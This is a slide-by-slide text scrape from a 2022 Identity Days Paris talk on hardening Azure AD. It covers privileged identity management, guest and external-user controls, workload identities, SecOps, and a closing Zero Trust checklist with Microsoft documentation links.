  • 32. Identity Days 2022 Azure AD Hardening Part3: Use PIM Privileged Identity Management (Azure AD P2) PIM Best Practices  Enable PIM for privileged accounts  Enable PIM for all admin roles (Zero Trust)  Configure each role with MFA  For a Global Admin account, grant 2H max (Zero Trust)  Think about the default duration: Permanent for partners  Configure email notifications to track usage  Configure Access Reviews for PIM every week  Activate the Privileged Access group 27 octobre 2022 - PARIS
  • 33. Identity Days 2022 Azure AD Hardening Part4: Use Microsoft Defender for Identity Why use Microsoft Defender for Identity?  Hyperscale SaaS protection in Azure  Defender for Cloud App integration  Multi-forest support  Detection of DC Shadow  Continuous updates in SaaS mode  ATA Sensor & ATA Sensor Standalone  Included with EMS E5, M365 E5 and M365 Security E5 27 octobre 2022 - PARIS
  • 34. Identity Days 2022 Azure AD Hardening Part5: Identity Governance – Use new Defender for Identity workflows Create user account (status: disabled) Launch custom Logic Apps workflow Send email to hiring manager with TAP Group assignments Send welcome email to new hire Send email to onboarding DL Generate Temporary Access Pass (TAP) Start date Enable user account Add user to Teams “New Hires” channel 27 octobre 2022 - PARIS
  • 35. Identity Days 2022 Azure AD Hardening Part6: Management of externals Identities and Collaboration 27 octobre 2022 - PARIS
  • 36. Identity Days 2022 Azure AD Hardening Part6: Externals Identities and new Cross-tenant feature New Cross-tenant feature best practices  Use case 1: Configure B2B Collaboration  Use case 2: Configure B2B Direct Connect  Configure Inbound in Granular Mode with MFA + Trust Compliance Device Claims  Configure Outbound with granularity and scope your groups  Block all B2B collaboration Outbound by default  Use the Shared Channel 27 octobre 2022 - PARIS
  • 37. Identity Days 2022 ID Action Impact 01 Dedicated Condtional Access for MFA Medium 02 Dynamic group included all External / Guest users Low 03 CA Hardering : Block all cloud app except ( Teams / SPO) High 04 CA Term of use Medium 05 Restriction – Prevent download - Web only Access for sensitive Teams / SharePoint site High 06 Session timeout ( daily MFA/ Authentication) High 07 Access review for guest accounts Medium 08 Sensitivity Label for M365 groups ( Teams and sharepoint Online) High 09 Dedicated audit log for Guest / External user access High Azure AD Hardening Part7: Protect yourself against Guest and External users with 9 control points 27 octobre 2022 - PARIS
  • 38. Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities of workloads can access Sensitive Data and Assets Source: SCIM Quarterly Analysis, July 7th, 2022 68% Source: Microsoft Security internal research 2021 Human identities Machine identities About 5 machine IDs for 1 human ID 27 octobre 2022 - PARIS
  • 39. Identity Days 2022 Azure AD Hardening Part8: Protect your Workload Identities Human identities Machine identities Future: about 20 machine IDs for 1 human ID  1: Deploy Access Review for SPNs  2: configure CAs for workload identities  3: Deploy AAD Identity Protection  4: Set up the User Consent Workflow  5: Audit and log with Defender for Cloud app / Azure Sentinel 27 octobre 2022 - PARIS
  • 40. Identity Days 2022 Azure AD Hardening Part9: Management of Externals Identities and collaboration 27 octobre 2022 - PARIS
  • 41. Identity Days 2022 Azure AD Hardening Part10: to go beyond… User Access Strategy  User admin ( Cloud Only)  PIM avec les droits nécessaires  Global Admin. : 2h  Other: 4 h  MFA / Passwordless FIDO2  Conditional Access:  Scope User Admins  Exclude: Break Glace accounts  Device : Windows  Emplacement: Trusted Location  Approve : Require Device to be marked as compliant  Identity protection  Sign-in Risk  User risk  Password Protection Privileged Access Workstation  Azure AD Autopilot profile  Compliance with Endpoint Manager  Security & Hardening Device Profile  Safety Baseline  Deny BYOD  Windows Update setup  Defender for Endpoint - Integration with Endpoint Manager 27 octobre 2022 - PARIS
  • 42. Identity Days 2022 Azure AD Hardening Part11: The tomorrow model... Enterprise Access model  Tier0  Access Control Plane  Management  Tier1  Management Plan  Data management  Application  Tier2  User access  Application access (API, …) 27 octobre 2022 - PARIS
  • 43. Identity Days 2022 Azure AD Hardening Part12: SecOps A SecOps implementation is essential  Management of unified alerts  Management of unified Incident  Log Management / Redirection  Proactivity  Automatic playbook trigger via Sentinel (remember to add Azure AD Data Connectors)  Remember to have a real Detection / Hunting and Response strategy  Don't Forget “Hunting” with KQL  Use Microsoft 365 Defender “Admin Center” 27 octobre 2022 - PARIS
  • 44. Conclusion Identity Days 2022 27 octobre 2022 - PARIS
  • 45. Zero Trust smooth deployment in 12 steps Think Hybrid and protect your On-Premise Active Directory environment! 1. Use Azure AD as your IAM 2. Manage Identity and Access 3. Provision users 4. Control All Authentications 5. Implement strong and secure Auths 6. Evaluate Authentications and Credentials 8. Determine Resource Access 7. Determine Trusted Zones 9. Apply minimum privileges 10. Secure administrative rights 11. Take advantage of Conditional Access 12. Train continuously! Modernize Identity and device management Consolidation then legacy infrastructure cleanup Configure secure access for all types of users Secure your hybrid environment Strong authentications, conditional access and intelligent strategies Secure experience for all users
  • 46. Identity Days 2021 Microsoft Documentation! Zero Trust Document Center https://docs.microsoft.com/en-us/security/zero-trust/ Monitor your Azure AD Secure Score https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/identity- secure-score Integrate your Apps into Azure AD https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/plan-an- application-integration Enable PHS and do not use PTA or ADFS federation Enable Seamless SSO and minimize the use of ADFS On-Premise Azure MFA + Passwordless avec FIDO2 (Yubico, …) Use PIM for IT teams Use Azure AD Identity Protection for Everyone Privileged Accounts | backup accounts | MFA | Passwordless Security Update Guide: Patch and patch again! https://msrc.microsoft.com/update-guide/ Conditional Access MFA for Guests MFA for Everyone Access policies and trusted locations Test | What If? Reports - SecOps Devices Azure AD logs (Sign-ins and applications) Users at risk: logins, locations, IP, GPS, Cloud App Security Azure Sentinel Passwords SSPR Smart Lockout Azure AD / Active Directory Password Protection Education & Communication with Users Internal training / Cyber best practices Finally, our Zero Trust “To-do list”
  • 47. Merci à tous nos partenaires ! 27 octobre 2022 - PARIS @IdentityDays #identitydays2022 Merci à tous ✨👍